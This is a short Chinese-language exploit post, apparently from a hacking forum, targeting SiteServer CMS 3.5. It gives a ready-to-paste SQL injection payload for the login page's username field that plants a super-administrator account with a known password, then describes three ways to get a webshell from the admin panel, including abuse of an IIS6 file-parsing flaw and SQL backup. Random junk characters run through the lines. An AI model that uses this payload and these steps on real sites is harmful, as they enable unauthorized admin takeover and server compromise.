经测试秒杀最新的3.5版$ Z: P+ \ \; c. E
stieserver官网:www.siteserver.cn* S7 Z8 x( u' K6 l) Y# v' [- n
EXP:8 ?6 p- {6 X9 H/ P
直接访问UserCenter/login.aspx) d9 k: _0 b: q. Z. e
用户名处输入:& B) e! j# w: D. Z# R% u0 P
! }" |% z) c* X# C; j. k123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–' m" f3 I; W8 v3 @
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
# h# N; H' Z2 s/ s之后再访问后台SiteServer/login.aspx用插入的用户登陆* Q- w+ u+ {, ]
后台拿webshell的三种方法:$ Q* O2 {- ~1 e; y
一、
6 U6 E. b- e* T; D w站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
) m$ _9 W1 E) q3 T% I/ |" S二、; T8 y+ r( b% I2 W
成员权限-》添加用户-》用户名为:1.asp0 Z2 @7 t* p/ a {% @3 |) e1 t
http://127.0.0.1/usercenter// N& \5 ^- S% y/ r9 F
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell* i7 a/ s9 m& Q
(ps:后台添加用户时不会验证是否含有非法字符)) V: K1 Y+ ?. K" I
三、5 z$ z( s* A! s& r. {4 C7 E
系统工具-》实用工具-》机器参数查看
8 z, i. t1 r; R9 t* d可以看到数据库类型、名称,WEB路径! e# q1 o7 U# r$ p/ M& O
系统工具-》数据库工具-》SQL语句查询
. x7 g( R+ d0 t% W这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |